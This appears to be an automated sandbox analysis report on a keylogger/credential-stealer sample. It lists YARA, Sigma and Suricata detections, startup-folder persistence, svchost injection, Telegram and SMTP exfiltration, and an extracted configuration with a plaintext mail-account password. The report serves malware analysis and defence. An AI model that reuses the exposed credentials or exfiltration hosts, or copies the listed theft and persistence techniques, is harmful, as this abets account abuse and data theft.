11.2.svchost.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 93 88 44 24 2B 88 44 24 2F B0 62 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
11.3.svchost.exe.366ef20.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.3.svchost.exe.366ef20.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
11.3.svchost.exe.366ef20.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.3.svchost.exe.366ef20.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33664:$a1: get_encryptedPassword 0x33638:$a2: get_encryptedUsername 0x336fc:$a3: get_timePasswordChanged 0x33614:$a4: get_passwordField 0x3367a:$a5: set_encryptedPassword 0x33447:$a7: get_logins 0x2ed32:$a10: KeyLoggerEventArgs 0x2ed01:$a11: KeyLoggerEventArgsEventHandler 0x3351b:$a13: _encryptedPassword
11.3.svchost.exe.366ef20.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3d3ba:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ca5d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ccba:$a4: \Orbitum\User Data\Default\Login Data 0x3d699:$a5: \Kometa\User Data\Default\Login Data
11.3.svchost.exe.366ef20.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31251:$s1: UnHook 0x311ed:$s2: SetHook 0x31226:$s3: CallNextHook 0x311b5:$s4: _hook
8.3.svchost.exe.326df20.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.3.svchost.exe.326df20.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
8.3.svchost.exe.326df20.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.3.svchost.exe.326df20.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33664:$a1: get_encryptedPassword 0x33638:$a2: get_encryptedUsername 0x336fc:$a3: get_timePasswordChanged 0x33614:$a4: get_passwordField 0x3367a:$a5: set_encryptedPassword 0x33447:$a7: get_logins 0x2ed32:$a10: KeyLoggerEventArgs 0x2ed01:$a11: KeyLoggerEventArgsEventHandler 0x3351b:$a13: _encryptedPassword
8.3.svchost.exe.326df20.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3d3ba:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ca5d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ccba:$a4: \Orbitum\User Data\Default\Login Data 0x3d699:$a5: \Kometa\User Data\Default\Login Data
8.3.svchost.exe.326df20.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31251:$s1: UnHook 0x311ed:$s2: SetHook 0x31226:$s3: CallNextHook 0x311b5:$s4: _hook
8.2.svchost.exe.7e00000.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.svchost.exe.7e00000.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
8.2.svchost.exe.7e00000.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.2.svchost.exe.7e00000.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x34384:$a1: get_encryptedPassword 0x34358:$a2: get_encryptedUsername 0x3441c:$a3: get_timePasswordChanged 0x34334:$a4: get_passwordField 0x3439a:$a5: set_encryptedPassword 0x34167:$a7: get_logins 0x2fa52:$a10: KeyLoggerEventArgs 0x2fa21:$a11: KeyLoggerEventArgsEventHandler 0x3423b:$a13: _encryptedPassword
8.2.svchost.exe.7e00000.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e0da:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3d77d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3d9da:$a4: \Orbitum\User Data\Default\Login Data 0x3e3b9:$a5: \Kometa\User Data\Default\Login Data
8.2.svchost.exe.7e00000.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31f71:$s1: UnHook 0x31f0d:$s2: SetHook 0x31f46:$s3: CallNextHook 0x31ed5:$s4: _hook
11.2.svchost.exe.8100000.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.svchost.exe.8100000.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
11.2.svchost.exe.8100000.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
11.2.svchost.exe.8100000.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.svchost.exe.8100000.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35264:$a1: get_encryptedPassword 0x35238:$a2: get_encryptedUsername 0x352fc:$a3: get_timePasswordChanged 0x35214:$a4: get_passwordField 0x3527a:$a5: set_encryptedPassword 0x35047:$a7: get_logins 0x30932:$a10: KeyLoggerEventArgs 0x30901:$a11: KeyLoggerEventArgsEventHandler 0x3511b:$a13: _encryptedPassword
11.2.svchost.exe.8100000.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3efba:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3e65d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3e8ba:$a4: \Orbitum\User Data\Default\Login Data 0x3f299:$a5: \Kometa\User Data\Default\Login Data
11.2.svchost.exe.8100000.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32e51:$s1: UnHook 0x32ded:$s2: SetHook 0x32e26:$s3: CallNextHook 0x32db5:$s4: _hook
11.2.svchost.exe.7d30f20.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.svchost.exe.7d30f20.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
11.2.svchost.exe.7d30f20.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
11.2.svchost.exe.7d30f20.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.svchost.exe.7d30f20.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35264:$a1: get_encryptedPassword 0x35238:$a2: get_encryptedUsername 0x352fc:$a3: get_timePasswordChanged 0x35214:$a4: get_passwordField 0x3527a:$a5: set_encryptedPassword 0x35047:$a7: get_logins 0x30932:$a10: KeyLoggerEventArgs 0x30901:$a11: KeyLoggerEventArgsEventHandler 0x3511b:$a13: _encryptedPassword
11.2.svchost.exe.7d30f20.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3efba:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3e65d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3e8ba:$a4: \Orbitum\User Data\Default\Login Data 0x3f299:$a5: \Kometa\User Data\Default\Login Data
11.2.svchost.exe.7d30f20.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32e51:$s1: UnHook 0x32ded:$s2: SetHook 0x32e26:$s3: CallNextHook 0x32db5:$s4: _hook
11.3.svchost.exe.366e000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.3.svchost.exe.366e000.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
11.3.svchost.exe.366e000.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
11.3.svchost.exe.366e000.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.3.svchost.exe.366e000.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x36184:$a1: get_encryptedPassword 0x36158:$a2: get_encryptedUsername 0x3621c:$a3: get_timePasswordChanged 0x36134:$a4: get_passwordField 0x3619a:$a5: set_encryptedPassword 0x35f67:$a7: get_logins 0x31852:$a10: KeyLoggerEventArgs 0x31821:$a11: KeyLoggerEventArgsEventHandler 0x3603b:$a13: _encryptedPassword
11.3.svchost.exe.366e000.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3feda:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f57d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3f7da:$a4: \Orbitum\User Data\Default\Login Data 0x401b9:$a5: \Kometa\User Data\Default\Login Data
11.3.svchost.exe.366e000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33d71:$s1: UnHook 0x33d0d:$s2: SetHook 0x33d46:$s3: CallNextHook 0x33cd5:$s4: _hook
Click to see the 157 entries

Sigma Signatures

System Summary

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbs" , ProcessId: 7516, ProcessName: wscript.exe

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\FACT0987789000900.exe", CommandLine: "C:\Users\user\Desktop\FACT0987789000900.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\FACT0987789000900.exe", ParentImage: C:\Users\user\AppData\Local\thixolabile\juvenile.exe, ParentProcessId: 7260, ParentProcessName: juvenile.exe, ProcessCommandLine: "C:\Users\user\Desktop\FACT0987789000900.exe", ProcessId: 7344, ProcessName: svchost.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbs" , ProcessId: 7516, ProcessName: wscript.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\FACT0987789000900.exe", CommandLine: "C:\Users\user\Desktop\FACT0987789000900.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\FACT0987789000900.exe", ParentImage: C:\Users\user\AppData\Local\thixolabile\juvenile.exe, ParentProcessId: 7260, ParentProcessName: juvenile.exe, ProcessCommandLine: "C:\Users\user\Desktop\FACT0987789000900.exe", ProcessId: 7344, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\thixolabile\juvenile.exe, ProcessId: 7260, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbs

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-03T09:21:14.784640+0100	2803305	3	Unknown Traffic	192.168.2.7	49727	188.114.96.3	443	TCP
2025-01-03T09:21:17.391864+0100	2803305	3	Unknown Traffic	192.168.2.7	49746	188.114.96.3	443	TCP
2025-01-03T09:21:20.007393+0100	2803305	3	Unknown Traffic	192.168.2.7	49768	188.114.96.3	443	TCP
2025-01-03T09:21:21.295929+0100	2803305	3	Unknown Traffic	192.168.2.7	49778	188.114.96.3	443	TCP
2025-01-03T09:21:22.599107+0100	2803305	3	Unknown Traffic	192.168.2.7	49788	188.114.96.3	443	TCP
2025-01-03T09:21:24.016481+0100	2803305	3	Unknown Traffic	192.168.2.7	49797	188.114.96.3	443	TCP
2025-01-03T09:21:26.402935+0100	2803305	3	Unknown Traffic	192.168.2.7	49823	188.114.96.3	443	TCP
2025-01-03T09:21:27.754348+0100	2803305	3	Unknown Traffic	192.168.2.7	49833	188.114.96.3	443	TCP
2025-01-03T09:21:30.401435+0100	2803305	3	Unknown Traffic	192.168.2.7	49853	188.114.96.3	443	TCP
2025-01-03T09:21:33.174242+0100	2803305	3	Unknown Traffic	192.168.2.7	49874	188.114.96.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-03T09:21:12.250715+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49710	132.226.247.73	80	TCP
2025-01-03T09:21:14.219632+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49710	132.226.247.73	80	TCP
2025-01-03T09:21:15.532027+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49733	132.226.247.73	80	TCP
2025-01-03T09:21:24.500797+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49802	132.226.247.73	80	TCP
2025-01-03T09:21:25.813329+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49802	132.226.247.73	80	TCP
2025-01-03T09:21:27.157041+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49827	132.226.247.73	80	TCP
2025-01-03T09:21:28.516421+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49838	132.226.247.73	80	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-03T09:21:25.002783+0100	1810007	1	Potentially Bad Traffic	192.168.2.7	49806	149.154.167.220	443	TCP
2025-01-03T09:21:36.930173+0100	1810007	1	Potentially Bad Traffic	192.168.2.7	49899	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000008.00000002.2547584481.0000000005541000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "info@2wapartments.com", "Password": "diezcansecoinfo24", "Host": "mail.2wapartments.com", "Port": "587", "Version": "4.4"}
Source: 8.2.svchost.exe.7e00f20.3.raw.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "info@2wapartments.com", "Password": "diezcansecoinfo24", "Host": "mail.2wapartments.com", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe

ReversingLabs: Detection: 71%

Multi AV Scanner detection for submitted file

Source: FACT0987789000900.exe	ReversingLabs: Detection: 71%
Source: FACT0987789000900.exe	Virustotal: Detection: 80%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: FACT0987789000900.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: FACT0987789000900.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49720 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49812 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49899 version: TLS 1.2

Source:	Binary string: _.pdb source: svchost.exe, 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: juvenile.exe, 00000006.00000003.1318218958.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 00000006.00000003.1318472638.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 0000000A.00000003.1445535094.0000000003E80000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 0000000A.00000003.1445352586.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: juvenile.exe, 00000006.00000003.1318218958.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 00000006.00000003.1318472638.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 0000000A.00000003.1445535094.0000000003E80000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 0000000A.00000003.1445352586.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004D6CA9 GetFileAttributesW,FindFirstFileW,FindClose,	3_2_004D6CA9
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004D60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	3_2_004D60DD
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004D63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	3_2_004D63F9
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004DEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	3_2_004DEB60
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004DF56F FindFirstFileW,FindClose,	3_2_004DF56F
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004DF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	3_2_004DF5FA
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004E1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	3_2_004E1B2F
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004E1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	3_2_004E1C8A
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004E1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	3_2_004E1F94
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_00916CA9 GetFileAttributesW,FindFirstFileW,FindClose,	6_2_00916CA9
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_009160DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	6_2_009160DD
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_009163F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	6_2_009163F9
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_0091EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	6_2_0091EB60
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_0091F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	6_2_0091F5FA
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_0091F56F FindFirstFileW,FindClose,	6_2_0091F56F
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_00921B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	6_2_00921B2F
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_00921C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	6_2_00921C8A
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_00921F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	6_2_00921F94

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 09232834h	8_2_09232580
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 09233206h	8_2_09232DE8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 0923CF7Ch	8_2_0923CCD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 09230D10h	8_2_09230B30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 0923169Ah	8_2_09230B30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 0923D3D4h	8_2_0923D128
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 09233206h	8_2_09233134
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 0923D82Ch	8_2_0923D580
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 09233206h	8_2_09232DE4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 0923DC84h	8_2_0923D9D8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	8_2_09230040
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 0923FAECh	8_2_0923F840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	8_2_09230856
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 0923EDE4h	8_2_0923EB38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 0923F23Ch	8_2_0923EF90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 0923F694h	8_2_0923F3E8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 0923E0DCh	8_2_0923DE30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	8_2_09230676
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 0923E534h	8_2_0923E288
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 0923E98Ch	8_2_0923E6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	11_2_086A0040
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 086AFAECh	11_2_086AF840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	11_2_086A0856
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 086ACF7Ch	11_2_086ACCD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 086AD3D4h	11_2_086AD128
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 086A3206h	11_2_086A3134
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 086A3206h	11_2_086A2DE8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 086A3206h	11_2_086A2DE2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 086ADC84h	11_2_086AD9D8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 086A2834h	11_2_086A2580
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 086AD82Ch	11_2_086AD580
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	11_2_086A0676
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 086AE0DCh	11_2_086ADE30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 086AE98Ch	11_2_086AE6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 086AE534h	11_2_086AE288
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 086AEDE4h	11_2_086AEB38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 086A0D10h	11_2_086A0B30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 086A169Ah	11_2_086A0B30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 086AF694h	11_2_086AF3E8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 086AF23Ch	11_2_086AEF90

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49899 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49806 -> 149.154.167.220:443

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 149.154.167.220 443	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 188.114.96.3 443	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 132.226.247.73 80	Jump to behavior

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

